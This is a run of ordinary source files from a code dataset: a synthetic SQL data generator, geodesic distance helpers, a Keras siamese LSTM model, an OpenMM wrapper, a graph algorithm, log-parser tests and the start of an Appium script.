0:\n assert len(l_f) != 0\n if len(l_m) == 0:\n assert len(l_m) != 0\n\n\n id = 0\n arrayid = [id]\n make_people_origin(arrayid,dentities)\n make_people_relationships(arrayid,dentities,drelationships)\n return\n\n def make_inventory_catalog(self):\n '''\n produce a dictionary of consumables and durables with msrp\n each consumable has 5 levels of expense, 1-5, with mean at 3\n each entity has 5 levels of afforability, 1-5, mean at 3\n each city has 5 levels of affordability, 1-5, with mean at 3\n\n for each subcategory, assign weights where one item is more expensive than another\n then for each item, have 5 different levels of expense\n\n this structure should be such that you can pick an item from subcategory,\n and choose which level of expense from that item.\n eg choose fruits:\n apple $1\n level0: $0.50\n level1: $0.75\n level2: $1\n level3: $2\n level4: $5\n banana $3\n level0: $0.50\n level1: $1\n level2: $3\n level3: $7\n level4: $10\n orange $5\n level0: $1\n level1: $3\n level2: $5\n level3: $10\n level4: $12\n\n that means for each subcategory, each item is already preranked by cost\n '''\n\n def select_inventory_recursive(inventory,dresult,pct_to_select,expense_level_min,expense_level_max):\n if isinstance(inventory,dict):\n for k,v in inventory.items():\n select_inventory_recursive(v,dresult,pct_to_select,expense_level_min,expense_level_max)\n elif isinstance(inventory,list):\n for item in inventory:\n if self.u.rand_bool(pct_to_select):\n pricepoints = item[self.S_ARRAY_PRICEPOINTS]\n for i in range(len(pricepoints)):\n if i >= expense_level_min and i <= expense_level_max:\n if self.u.rand_bool(self.S_SELECT_LIKELY_PCT):\n pricepoint = pricepoints[i]\n dresult[item[self.S_ITEM_NAME]] = {}\n dresult[item[self.S_ITEM_NAME]][i] = pricepoint\n\n def make_inventory_for_business(keys_categories,inventory_all,pct_to_select_min,pct_to_select_max,\n expense_level_min,expense_level_max,markup_pct_min,markup_pct_max):\n\n assert pct_to_select_min >= 0 and pct_to_select_max <= 100 and pct_to_select_min <= pct_to_select_max\n assert expense_level_min >= 0 and expense_level_max <= 4 and expense_level_min < expense_level_max\n assert markup_pct_min >= 0 and markup_pct_max <= 100 and markup_pct_min < markup_pct_max\n\n dinventory = {}\n\n for key_category in keys_categories:\n if key_category not in inventory_all:\n raise Exception('{} is not valid inventory category key'.format(key_category))\n inventory_category = inventory_all[key_category]\n pct_to_select = self.u.rand_int_inclusive(pct_to_select_min,pct_to_select_max)\n select_inventory_recursive(inventory_category,dinventory,pct_to_select,expense_level_min,expense_level_max)\n\n for item,pricepoints in dinventory.items():\n for level,pricepoint in pricepoints.items():\n markup = self.u.rand_int_inclusive(markup_pct_min,markup_pct_max)\n markup_pricepoint = int(pricepoint * markup/100)\n pricepoints[level] = markup_pricepoint\n\n return dinventory\n\n def make_inventory_for_businesses():\n inventory_all = self.inventory\n keys_categories = [self.u.choice([self.S_CAT_CONSUME,self.S_CAT_DURABLES])]\n pct_to_select_min = self.S_PCT_TO_SELECT_MIN\n pct_to_select_max = self.S_PCT_TO_SELECT_MAX\n expense_level_mu = self.u.rand_int(self.S_EXPENSE_LEVEL_MIN,self.S_EXPENSE_LEVEL_MAX)\n expense_level_min = expense_level_mu if expense_level_mu == self.S_EXPENSE_LEVEL_MIN else (expense_level_mu-1)\n expense_level_max = expense_level_mu if expense_level_mu == self.S_EXPENSE_LEVEL_MAX else (expense_level_mu+1)\n markup_pct_mu = self.u.rand_int(75,150)\n markup_pct_min = markup_pct_mu-10\n markup_pct_max = markup_pct_mu+10\n dinventory = make_inventory_for_business(keys_categories,inventory_all,pct_to_select_min,pct_to_select_max,\n expense_level_min,expense_level_max,markup_pct_min,markup_pct_max)\n\n def make_catalog_all():\n dentities = self.entity_types\n inventory = self.inventory\n dmsrp = self.d_msrp\n\n inventory[self.S_CAT_CONSUME] = {}\n inventory[self.S_CAT_DURABLES] = {}\n\n for ksubcategories,items in dentities[self.S_CAT_CONSUME].items():\n inventory[self.S_CAT_CONSUME][ksubcategories] = {}\n inventory[self.S_CAT_CONSUME][ksubcategories][self.S_ARRAY] = []\n for item in items:\n msrp = self.u.rand_int_pct(dmsrp[ksubcategories],self.S_CONSUME_MSRP_MIN_PCT,self.S_CONSUME_MSRP_MAX_PCT)\n pricepoints = self.u.get_vals_from_pct(msrp,self.S_CONSUME_PRICEPOINTS_PCT)\n item_obj = {\n self.S_ITEM_NAME:item,\n self.S_MSRP:msrp,\n self.S_ARRAY_PRICEPOINTS:pricepoints\n }\n inventory[self.S_CAT_CONSUME][ksubcategories][self.S_ARRAY].append(item_obj)\n for ksubcategories,items in dentities[self.S_CAT_DURABLES].items():\n inventory[self.S_CAT_DURABLES][ksubcategories] = {}\n inventory[self.S_CAT_DURABLES][ksubcategories][self.S_ARRAY] = []\n for item in items:\n msrp = self.u.rand_int_pct(dmsrp[ksubcategories],self.S_DURABLE_MSRP_MIN_PCT,self.S_DURABLE_MSRP_MAX_PCT)\n pricepoints = self.u.get_vals_from_pct(msrp,self.S_DURABLE_PRICEPOINTS_PCT)\n item_obj = {\n self.S_ITEM_NAME:item,\n self.S_MSRP:msrp,\n self.S_ARRAY_PRICEPOINTS:pricepoints\n }\n inventory[self.S_CAT_DURABLES][ksubcategories][self.S_ARRAY].append(item_obj)\n\n daddr = self.data_addresses\n\n make_catalog_all()\n\n\n # first find how many businesses there are. take about 50% of those for combination\n # of consume and durables. make random between 40-90% consumable, and durables as 10-60%\n\n\n def make_transaction_receipts(self, data_geo, data_entities, data_inventory):\n '''\n\n '''\n return\n\n\n def recurse_entity_types_old(self,d,level,category,subcat0,subcat1,patharraybuf,tentryarraybuf,detype2id,arrayid):\n if isinstance(d,dict):\n for k,v in d.items():\n patharraybuf.append(k)\n if k in detype2id:\n assert k not in detype2id\n detype2id[k] = arrayid[0]\n if level == 0:\n tentryarraybuf.append('insert into entity_types(id,category,value) values({},\"{}\",\"{}\")'\n .format(arrayid[0],k,k))\n arrayid[0] += 1\n self.recurse_entity_types(v,level+1,k,None,None,patharraybuf,tentryarraybuf,detype2id,arrayid)\n elif level == 1:\n fullpathval = ','.join(patharraybuf)\n tentryarraybuf.append('insert into entity_types(id,category,subcat0,fullpath,value) values({},\"{}\",\"{}\",\"{}\",\"{}\")'\n .format(arrayid[0],category,k,fullpathval,k))\n arrayid[0] += 1\n self.recurse_entity_types(v,level+1,category,k,None,patharraybuf,tentryarraybuf,detype2id,arrayid)\n else:\n fullpathval = ','.join(patharraybuf)\n cur_subcat1 = subcat1 if subcat1 is not None else k\n tentryarraybuf.append('insert into entity_types(id,category,subcat0,subcat1,fullpath,value) values({},\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'\n .format(arrayid[0],category,subcat0,cur_subcat1,fullpathval,k))\n arrayid[0] += 1\n self.recurse_entity_types(v,level+1,category,subcat0,subcat1,patharraybuf,tentryarraybuf,detype2id,arrayid)\n patharraybuf.pop()\n elif isinstance(d,list):\n for v in d:\n fullpathval = ','.join(patharraybuf)\n if v in detype2id:\n assert v not in detype2id\n detype2id[v] = arrayid[0]\n if level == 0:\n tentryarraybuf.append('insert into entity_types(id,category,fullpath,value) values({},\"{}\",\"{}\",\"{}\")'\n .format(arrayid[0],category,fullpathval,v))\n arrayid[0] += 1\n elif level == 1:\n tentryarraybuf.append('insert into entity_types(id,category,subcat0,fullpath,value) values({},\"{}\",\"{}\",\"{}\",\"{}\")'\n .format(arrayid[0],category,subcat0,fullpathval,v))\n arrayid[0] += 1\n else:\n tentryarraybuf.append('insert into entity_types(id,category,subcat0,subcat1,fullpath,value) values({},\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'\n .format(arrayid[0],category,subcat0,subcat1,fullpathval,v))\n arrayid[0] += 1\n else:\n raise Exception('ERROR unrecognized format in make_sql_tables for d: {}'.format(d))\n\n def recurse_entity_types(self,d,level,category,subcat0,subcat1,patharraybuf,tentryarraybuf,detype2id,arrayid):\n if isinstance(d,dict):\n for k,v in d.items():\n patharraybuf.append(k)\n if k in detype2id:\n assert k not in detype2id\n detype2id[k] = arrayid[0]\n fullpath = None\n if len(patharraybuf) != 0:\n fullpath = ','.join(patharraybuf)\n tentryarraybuf.append('insert into entity_types(id,value,fullpath) values({},\"{}\",\"{}\");'.format(arrayid[0],k,fullpath))\n else:\n tentryarraybuf.append('insert into entity_types(id,value) values({},\"{}\");'.format(arrayid[0],k))\n arrayid[0] += 1\n self.recurse_entity_types(v,level+1,k,None,None,patharraybuf,tentryarraybuf,detype2id,arrayid)\n patharraybuf.pop()\n elif isinstance(d,list):\n for v in d:\n fullpathval = ','.join(patharraybuf)\n if v in detype2id:\n assert v not in detype2id\n detype2id[v] = arrayid[0]\n tentryarraybuf.append('insert into entity_types(id,value,fullpath) values({},\"{}\",\"{}\");'.format(arrayid[0],v,fullpathval))\n arrayid[0] += 1\n\n else:\n raise Exception('ERROR unrecognized format in make_sql_tables for d: {}'.format(d))\n\n\n def make_sql_tables(self, do_print=True):\n\n # entity_type\n detype2id = {}\n id = 0\n arrayid = [id]\n entity_types = self.entity_types\n tentitytypes = []\n #tentitytypes.append('create table entity_types(id integer primary key, category text, subcat0 text, subcat1 text, fullpath text, value text)')\n tentitytypes.append('create table entity_types(id integer primary key, value text, fullpath text);')\n self.recurse_entity_types(entity_types,0,None,None,None,[],tentitytypes,detype2id,arrayid)\n\n print('-------------------ENTITY_TYPES')\n for line in tentitytypes:\n print(line)\n\n\n # cities and addresses\n tcities = []\n tcities.append('create table cities(id integer primary key, state text, city text, base_zip integer);')\n taddress = []\n taddress.append('create table addresses(id integer primary key autoincrement, id_city integer, street text, address_id integer, unit integer, zip integer, id_type);')\n data_addresses = self.data_addresses\n idcity = 0\n for statename,stateval in data_addresses[self.S_DATAKEY_STATES].items():\n for cityname,cityval in stateval[self.S_DATAKEY_CITIES].items():\n tcities.append('insert into cities(id,state,city,base_zip) values(\"{}\",\"{}\",\"{}\",{});'\n .format(idcity,statename,cityname,cityval[self.S_KEY_CITY_BASE_ZIP]))\n for streetname,streetval in cityval[self.S_DATAKEY_STREETS].items():\n for addressname,addressval in streetval[self.S_DATAKEY_ADDRS].items():\n if self.S_DATAKEY_ADDR_UNITS in addressval:\n for unitid,unitval in addressval[self.S_DATAKEY_ADDR_UNITS].items():\n try:\n address_id = addressname # addressval[self.S_DATAKEY_ADDR_NUM_ID]\n unit = addressval[self.S_DATAKEY_ADDR_UNIT_ID] # if self.S_DATAKEY_ADDR_UNIT_ID in addressval else None\n zip = addressval[self.S_DATAKEY_ADDR_ZIP]\n id_type = addressval[self.S_DATAKEY_ADDR_TYPE]\n taddress.append('insert into addresses(id_city,street,address_id,unit,zip,id_type) values({},\"{}\",{},{},{},\"{}\");'\n .format(idcity,streetname,address_id,unit,zip,id_type))\n #if unit == None:\n # taddress.append('insert into addresses(id_city,street,address_id,zip,id_type) values(\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'\n # .format(idcity,streetname,address_id,zip,id_type))\n #else:\n # taddress.append('insert into addresses(id_city,street,address_id,unit,zip,id_type) values(\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'\n # .format(idcity,streetname,address_id,unit,zip,id_type))\n except Exception as e:\n p('ERROR: {}'.format(e))\n else:\n try:\n address_id = addressname # addressval[self.S_DATAKEY_ADDR_NUM_ID]\n #unit = addressval[self.S_DATAKEY_ADDR_UNIT_ID] if self.S_DATAKEY_ADDR_UNIT_ID in addressval else None\n zip = addressval[self.S_DATAKEY_ADDR_ZIP]\n id_type = addressval[self.S_DATAKEY_ADDR_TYPE]\n taddress.append('insert into addresses(id_city,street,address_id,zip,id_type) values({},\"{}\",{},{},\"{}\");'\n .format(idcity,streetname,address_id,zip,id_type))\n #if unit == None:\n # taddress.append('insert into addresses(id_city,street,address_id,zip,id_type) values(\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'\n # .format(idcity,streetname,address_id,zip,id_type))\n #else:\n # taddress.append('insert into addresses(id_city,street,address_id,unit,zip,id_type) values(\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'\n # .format(idcity,streetname,address_id,unit,zip,id_type))\n except Exception as e:\n p('ERROR: {}'.format(e))\n idcity += 1\n print('-------------------CITIES')\n for line in tcities:\n print(line)\n print('-------------------ADDRESSES')\n for line in taddress:\n print(line)\n\n # entities\n data_entities = self.data_entities\n tentities = []\n tentities.append('create table entities(gid integer primary key, id_entity_category integer, id integer, firstname text, lastname text, id_entity_type, startdate date, enddate date);')\n for entity_category,entities in data_entities.items():\n id_entity_category = detype2id[entity_category]\n for k,v in entities.items():\n try:\n id = v[self.S_ID]\n firstname = v[self.S_ENTITY_FIRSTNAME] if self.S_ENTITY_FIRSTNAME in v else None\n lastname = v[self.S_ENTITY_LASTNAME] if self.S_ENTITY_LASTNAME in v else None\n entity_type = v[self.S_ENTITY_TYPE]\n startdate = v[self.S_ENTITY_START_DATE] if self.S_ENTITY_START_DATE in v else None\n enddate = v[self.S_ENTITY_END_DATE] if self.S_ENTITY_END_DATE in v else None\n keys = ['id_entity_category','id']\n values = [id_entity_category,id]\n if firstname is not None:\n keys.append('firstname')\n values.append('\"{}\"'.format(firstname))\n if lastname is not None:\n keys.append('lastname')\n values.append('\"{}\"'.format(lastname))\n keys.append('id_entity_type')\n values.append('\"{}\"'.format(entity_type))\n strkeys = ','.join(keys)\n aryvals = ['{}'.format(v) for v in values]\n strvals = ','.join(aryvals)\n tentities.append('insert into entities({}) values({});'.format(strkeys,strvals))\n except Exception as e:\n p(e)\n print('-------------------ENTITIES')\n for line in tentities:\n print(line)\n\n # entity_relationships\n data_relationships = self.data_relationships\n trelationships = []\n trelationships.append('create table relationships(gid integer primary key, id_src, id_dst, id_relationship_type);')\n for idsrc,relationships in data_relationships.items():\n for relationship_type,array_iddst in relationships.items():\n id_relationship_type = detype2id[relationship_type]\n for iddst in array_iddst:\n trelationships.append('insert into relationships(id_src,id_dst,id_relationship_type) values ({},{},{});'.format(idsrc,iddst,id_relationship_type))\n\n print('-------------------RELATIONSHIPS')\n for line in trelationships:\n print(line)\n\nclass ut(unittest.TestCase):\n '''\n def __init__(self):\n pass\n __init__ gets overridden, so dont define it\n '''\n def test_generate_db_data(self):\n\n def construct_database_0():\n t = sql_data_maker()\n data = t.make_table_cities(num_states=10,min_cities_per_state=2,max_cities_per_state=6)\n #print('\\n')\n etypes = t.choose_type([sql_data_maker.S_CAT_ADDR,sql_data_maker.S_ADDR_RES],5)\n #print(etypes)\n #print('\\n')\n etypes = t.choose_type([sql_data_maker.S_CAT_CONSUME,sql_data_maker.S_CONSUME_GRAINS],5)\n #print(etypes)\n t.make_table_addresses(data,3,8)\n json_val = json.dumps(data,indent=4,sort_keys=True)\n print(json_val)\n return\n\n def test_make_table_entities():\n t = sql_data_maker()\n t.num_original_descendants = 10\n t.max_num_person = 500\n t.max_num_virtual = 100\n t.max_num_animal = 1000\n\n data = t.make_table_cities(num_states=10,min_cities_per_state=5,max_cities_per_state=10)\n t.make_table_addresses(data,min_num_streets=3,max_num_streets=10)\n\n (entities,relationships) = t.make_table_entities()\n\n json_val = json.dumps(entities,indent=4,sort_keys=True)\n #print('----------------------entities')\n #print(json_val)\n\n json_val = json.dumps(relationships,indent=4,sort_keys=True)\n #print('----------------------relationships')\n #print(json_val)\n\n t.make_inventory_catalog()\n\n #t.make_sql_tables()\n\n return\n\n #construct_database_0()\n test_make_table_entities()\n\n","sub_path":"src/main/db/make_sql_data.py","file_name":"make_sql_data.py","file_ext":"py","file_size_in_byte":51844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"130595301","text":"def prime(n):\n count=0\n for i in range(1,n+1):\n if(n%i==0):\n count=count+1\n if(count>2):\n return False\n else:\n return True\nN=int(input())\nif(N%2==0):\n print(\"valid\")\nelif((N%2)!=0 and prime(N)==True):\n print(\"valid\")\nelse:\n print(\"invalid\")\n","sub_path":"20-01-19/20-01.py","file_name":"20-01.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"10545901","text":"# -*- coding: utf-8 -*-\nimport numpy\nfrom django.db.models import Q\nfrom math import sin, cos, sqrt, atan2, radians\nfrom scipy.spatial import KDTree\n\nfrom inguri.core.models import Entity\n\n\n# Constants defined by the World Geodetic System 1984 (WGS84)\nA = 6378.137\nB = 6356.7523142\nESQ = 6.69437999014 * 0.001\n\n\ndef distance(objA_latitude, objA_longitude, objB_latitude, objB_longitude):\n \"\"\" Standard distance calculation between two objects\n \"\"\"\n try:\n lat1 = radians(float(objA_latitude))\n lon1 = radians(float(objA_longitude))\n lat2 = radians(float(objB_latitude))\n lon2 = radians(float(objB_longitude))\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = (sin(dlat/2))**2 + cos(lat1) * cos(lat2) * (sin(dlon/2))**2\n c = 2 * atan2(sqrt(a), sqrt(1-a))\n return round(6373.0 * c, 2)\n except:\n return Exception(\"Lat/Lon not provided\")\n\n\ndef geodetic2ecef(lat, lon, alt=0):\n \"\"\"Convert geodetic coordinates to ECEF.\"\"\"\n lat, lon = radians(lat), radians(lon)\n xi = sqrt(1 - ESQ * sin(lat))\n x = (A / xi + alt) * cos(lat) * cos(lon)\n y = (A / xi + alt) * cos(lat) * sin(lon)\n z = (A / xi * (1 - ESQ) + alt) * sin(lat)\n return x, y, z\n\n\ndef euclidean_distance(distance):\n \"\"\"Return the approximate Euclidean distance corresponding to the\n given great circle distance (in km).\n \"\"\"\n return 2 * A * sin(distance / (2 * B))\n\n\ndef calculate_closest_objects(radius, queryset=None, model=None):\n if queryset:\n queryset = queryset.exclude(Q(latitude=None) | Q(longitude=None))\n elif model:\n queryset = model.objects.exclude(Q(latitude=None) | Q(longitude=None))\n else:\n raise Exception(\"Either Queryset or Model must be given\")\n\n focus_entities = Entity.objects.filter(taxonomy__focus=True) \\\n .exclude(Q(latitude=None) | Q(longitude=None))\n\n objects = queryset | focus_entities\n\n ecef_objects = [geodetic2ecef(o.latitude, o.longitude) for o in objects]\n tree = KDTree(numpy.array(ecef_objects))\n R = euclidean_distance(radius)\n\n for i, obj in enumerate(ecef_objects):\n if objects[i] not in queryset:\n continue\n results = tree.query_ball_point([obj], r=R)[0]\n closest = [objects[r] for r in results if objects[r].taxonomy.focus]\n if objects[i] in closest:\n closest.remove(objects[i])\n objects[i].closest.clear()\n objects[i].closest.add(*closest)\n","sub_path":"inguri/utils/maps/distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"3694203","text":"import tensorflow as tf\nfrom tensorflow.keras.layers import LSTM, Bidirectional, Dense, Input, Dropout, Lambda\nfrom tensorflow.keras.regularizers import l2\nfrom src.common import Common\nfrom src.model_architectures.model_functions import create_embeddings, l1_distance\n\ndef siamese_network(input_shape):\n # Defines our inputs\n left_title = Input(input_shape, dtype='string')\n right_title = Input(input_shape, dtype='string')\n \n # Create embeddings\n CreateEmbeddings = Lambda(create_embeddings, output_shape=(None, Common.MAX_LEN, Common.EMBEDDING_SHAPE[0]))\n left_embeddings = CreateEmbeddings(left_title)\n right_embeddings = CreateEmbeddings(right_title)\n \n # The LSTM units\n model = tf.keras.Sequential(name='siamese_model')\n model.add(Bidirectional(LSTM(units=128,\n name='lstm_1',\n return_sequences=True,\n activity_regularizer=l2(0.007),\n recurrent_regularizer=l2(0.0002), \n kernel_regularizer=l2(0.0002))))\n model.add(Dropout(rate=0.5))\n model.add(Bidirectional(LSTM(units=64,\n name='lstm_2',\n return_sequences=True,\n activity_regularizer=l2(0.007),\n recurrent_regularizer=l2(0.0002), \n kernel_regularizer=l2(0.0002))))\n model.add(Dropout(rate=0.5))\n model.add(Bidirectional(LSTM(units=64,\n name='lstm_3',\n return_sequences=True,\n activity_regularizer=l2(0.007),\n recurrent_regularizer=l2(0.0002), \n kernel_regularizer=l2(0.0002))))\n model.add(Dropout(rate=0.5))\n model.add(Bidirectional(LSTM(units=64,\n #return_sequences=True,\n name='lstm_4',\n activity_regularizer=l2(0.007),\n recurrent_regularizer=l2(0.0002), \n kernel_regularizer=l2(0.0002))))\n model.add(Dropout(rate=0.5))\n # The dense layers\n model.add(Dense(units=512, activation='elu', name='dense_1'))\n model.add(Dropout(rate=0.6))\n model.add(Dense(units=256, activation='elu', name='dense_2'))\n \n # Forward propagate through the model to generate the encodings\n encoded_left_title = model(left_embeddings)\n encoded_right_title = model(right_embeddings)\n\n # Take the L1 difference between the embeddings\n Distance = Lambda(l1_distance)\n distance = Distance([encoded_left_title, encoded_right_title])\n \n # Send the distance to a dense layer\n distance = Dense(units=128, activation='elu', name='dense_3')(distance)\n\n # Send the dense layer to the sigmoid classifier\n distance = Dropout(0.5)(distance)\n prediction = Dense(units=1, activation='sigmoid', kernel_regularizer=l2(0.0001))(distance)\n \n # Create and return the network\n siamese_net = tf.keras.Model(inputs=[left_title, right_title], outputs=prediction, name='siamese_network')\n return siamese_net\n","sub_path":"legacy/distance_sigmoid.py","file_name":"distance_sigmoid.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"636452450","text":"from io import StringIO\n\nimport numpy as np\nimport simtk.openmm as mm\nfrom simtk import unit\nfrom simtk.openmm import app\n\nfrom rlmm.utils.config import Config\n\n\nclass SystemParams(Config):\n def __init__(self, config_dict):\n for k, v in config_dict.items():\n if isinstance(v, dict):\n for k_, v_ in v.items():\n exec('v[k_] = ' + v_)\n else:\n exec('config_dict[k] = ' + str(v))\n self.__dict__.update(config_dict)\n\n\nclass OpenMMSimulationWrapper:\n class Config(Config):\n def __init__(self, args):\n self.parameters = SystemParams(args['params'])\n self.systemloader = None\n if args is not None:\n self.__dict__.update(args)\n\n def get_obj(self, system_loader):\n self.systemloader = system_loader\n return OpenMMSimulationWrapper(self)\n\n def __init__(self, config_: Config):\n \"\"\"\n\n :param systemLoader:\n :param config:\n \"\"\"\n self.config = config_\n system = self.config.systemloader.get_system(self.config.parameters.createSystem)\n\n integrator = self.config.parameters.integrator(*self.config.parameters.integrator_params.values())\n\n integrator.setConstraintTolerance(self.config.parameters.integrator_setConstraintTolerance)\n\n # prepare simulation\n self.simulation = app.Simulation(self.config.systemloader.get_topology(), system, integrator,\n self.config.parameters.platform)\n self.simulation.context.setPositions(self.config.systemloader.get_positions())\n\n # minimize\n self.simulation.minimizeEnergy()\n\n # equilibrate for 100 steps\n self.simulation.context.setVelocitiesToTemperature(self.config.parameters.integrator_params['temperature'])\n\n def translate(self, x, y, z, minimize=True):\n \"\"\"\n\n :param x:\n :param y:\n :param z:\n :param minimize:\n \"\"\"\n pos = self.simulation.context.getState(getPositions=True, getVelocities=True)\n pos = pos.getPositions(asNumpy=True)\n # pos[5082:5125] += np.array([x, y, z]) * unit.angstrom\n\n if minimize:\n self.simulation.minimizeEnergy()\n self.simulation.context.setVelocitiesToTemperature(self.config.parameters.integrator_params['temperature'])\n\n def run(self, steps):\n \"\"\"\n\n :param steps:\n \"\"\"\n self.simulation.step(steps)\n\n def get_coordinates(self):\n \"\"\"\n\n :return:\n \"\"\"\n return self.simulation.context.getState(getPositions=True).getPositions(asNumpy=True)\n\n def get_pdb(self):\n \"\"\"\n\n :return:\n \"\"\"\n output = StringIO()\n app.PDBFile.writeFile(self.simulation.topology,\n self.simulation.context.getState(getPositions=True).getPositions(),\n file=output)\n return output.getvalue()\n","sub_path":"rlmm/environment/openmmWrapper.py","file_name":"openmmWrapper.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"71734303","text":"# O(v + e) time | O(v) space - where v is the number of\r\n# vertices and e is the number of edges in the graph\r\ndef twoEdgeConnectedGraph(edges):\r\n if len(edges) == 0:\r\n\r\n return True\r\n arrivalTimes = [-1] * len(edges)\r\n startVertex = 0\r\n if getMinimumArrivalTimeOfAncestors(startVertex, -1, 0, arrivalTimes, edges) == -1:\r\n return False\r\n return areAllVerticesVisited(arrivalTimes)\r\n\r\ndef areAllVerticesVisited(arrivalTimes):\r\n for time in arrivalTimes:\r\n if time == -1:\r\n return False\r\n return True\r\n\r\ndef getMinimumArrivalTimeOfAncestors(currentVertex, parent, currentTime, arrivalTimes, edges):\r\n arrivalTimes[currentVertex] = currentTime\r\n minimumArrivalTime = currentTime\r\n for destination in edges[currentVertex]:\r\n if arrivalTimes[destination] == -1:\r\n minimumArrivalTime = min(\r\n minimumArrivalTime,\r\n getMinimumArrivalTimeOfAncestors(destination, currentVertex, currentTime + 1, arrivalTimes, edges),\r\n )\r\n elif destination != parent:\r\n minimumArrivalTime = min(minimumArrivalTime, arrivalTimes[destination])\r\n # A bridge was detected, which means the graph isn't two-edge-connected.\r\n if minimumArrivalTime == currentTime and parent != -1:\r\n return -1\r\n return minimumArrivalTime","sub_path":"graph/Two-Connected Graph/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"327146681","text":"from __future__ import print_function, division, absolute_import\nfrom fluenpy.parser import TextParser\nimport time\n\n\ndef test_apache():\n parser = TextParser()\n parser.configure({'format': 'apache'})\n t, record = parser.parse('192.168.0.1 - - [28/Feb/2013:12:00:00 +0100] \"GET / HTTP/1.1\" 200 777')\n tm = time.gmtime(t)\n assert tm.tm_year == 2013\n assert tm.tm_mon == 2\n assert tm.tm_mday == 28\n assert tm.tm_hour == 11\n assert record == {\n 'user': '-',\n 'method': 'GET',\n 'code': '200',\n 'size': '777',\n 'host': '192.168.0.1',\n 'path': '/',\n }\n\ndef test_apache2():\n parser = TextParser()\n parser.configure({'format': 'apache2'})\n t, record = parser.parse('192.168.0.1 - - [27/Feb/2013:20:00:00 -0900] \"GET / HTTP/1.1\" 200 777 \"-\" \"Opera/12.0\"')\n tm = time.gmtime(t)\n assert tm.tm_year == 2013\n assert tm.tm_mon == 2\n assert tm.tm_mday == 28\n assert tm.tm_hour == 5\n assert record == {\n 'user' : None,\n 'method' : 'GET',\n 'code' : 200,\n 'size' : 777,\n 'host' : '192.168.0.1',\n 'path' : '/',\n 'referer': None,\n 'agent' : 'Opera/12.0'\n }\n\ndef test_syslog():\n parser = TextParser()\n parser.configure({'format': 'syslog'})\n t, record = parser.parse('Feb 28 12:00:00 192.168.0.1 fluentd[11111]: [error] Syslog test')\n tm = time.gmtime(t)\n now = time.gmtime()\n assert tm.tm_year == now.tm_year\n assert tm.tm_mon == 2\n assert tm.tm_mday == 28\n assert tm.tm_hour == 12\n assert tm.tm_min == 0\n assert tm.tm_sec == 0\n assert record == {\n 'host' : '192.168.0.1',\n 'ident' : 'fluentd',\n 'pid' : '11111',\n 'message': '[error] Syslog test',\n }\n\ndef test_json():\n parser = TextParser()\n parser.configure({'format': 'json'})\n t, record = parser.parse('{\"time\":1362020400,\"host\":\"192.168.0.1\",\"size\":777,\"method\":\"PUT\"}')\n assert t == 1362020400\n assert record == {\n 'host' : '192.168.0.1',\n 'size' : 777,\n 'method': 'PUT',\n }\n\ndef test_nginx():\n parser = TextParser()\n parser.configure({'format': 'nginx'})\n t, record = parser.parse('127.0.0.1 192.168.0.1 - [28/Feb/2013:12:00:00 +0900] \"GET / HTTP/1.1\" 200 777 \"-\" \"Opera/12.0\"')\n tm = time.gmtime(t)\n assert (tm.tm_year, tm.tm_mon, tm.tm_mday) == (2013, 2, 28)\n assert (tm.tm_hour, tm.tm_min, tm.tm_sec) == (3, 0, 0)\n assert record == {\n 'remote' : '127.0.0.1',\n 'host' : '192.168.0.1',\n 'user' : '-',\n 'method' : 'GET',\n 'path' : '/',\n 'code' : '200',\n 'size' : '777',\n 'referer': '-',\n 'agent' : 'Opera/12.0',\n }\n\ndef test_ltsv_config():\n parser = TextParser()\n parser.configure({'format': 'ltsv'})\n\n assert parser.parser.delimiter == '\\t'\n assert parser.parser.label_delimiter == ':'\n\n parser.configure({\n 'format': 'ltsv',\n 'delimiter': ',',\n 'label_delimiter': '=',\n })\n\n assert parser.parser.delimiter == ','\n assert parser.parser.label_delimiter == '='\n\ndef test_ltsv():\n parser = TextParser()\n parser.configure({'format': 'ltsv'})\n\n _, record = parser.parse(\"time:[28/Feb/2013:12:00:00 +0900]\\thost:192.168.0.1\\treq:GET /list HTTP/1.1\")\n\n assert record == {\n 'time':'[28/Feb/2013:12:00:00 +0900]',\n 'host':'192.168.0.1',\n 'req' :'GET /list HTTP/1.1',\n }\n\ndef test_ltsv_cosutomized_delimiter():\n parser = TextParser()\n parser.configure({'format': 'ltsv', 'delimiter':',', 'label_delimiter':'='})\n\n _, record = parser.parse('time=[28/Feb/2013:12:00:00 +0900],host=192.168.0.1,req=GET /list HTTP/1.1')\n\n assert record == {\n 'time':'[28/Feb/2013:12:00:00 +0900]',\n 'host':'192.168.0.1',\n 'req' :'GET /list HTTP/1.1',\n }\n","sub_path":"fluenpy/tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"76443786","text":"import time\nfrom appium import webdriver\n\n# server 启动参数\ndesired_caps = {}\n# 设备信息\ndesired_caps['platformName'] = 'Android'\ndesired_caps['platformVersion'] = '5.1'\ndesired_caps['deviceName'] = '192.168.56.101:5555'\n# app的信息\ndesired_caps['appPackage'] = 'com.android.settings'\ndesired_caps['appActivity'] = '.Settings'\n\n# 声明我们的driver对象\ndriver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)\n\nsave_button = driver.find_element_by_xpath(\"//*[contains(@text,'存储')]\")\nmore_button = driver.find_element_by_xpath(\"//*[contains(@text,'更多')]\")\n# battery_button = 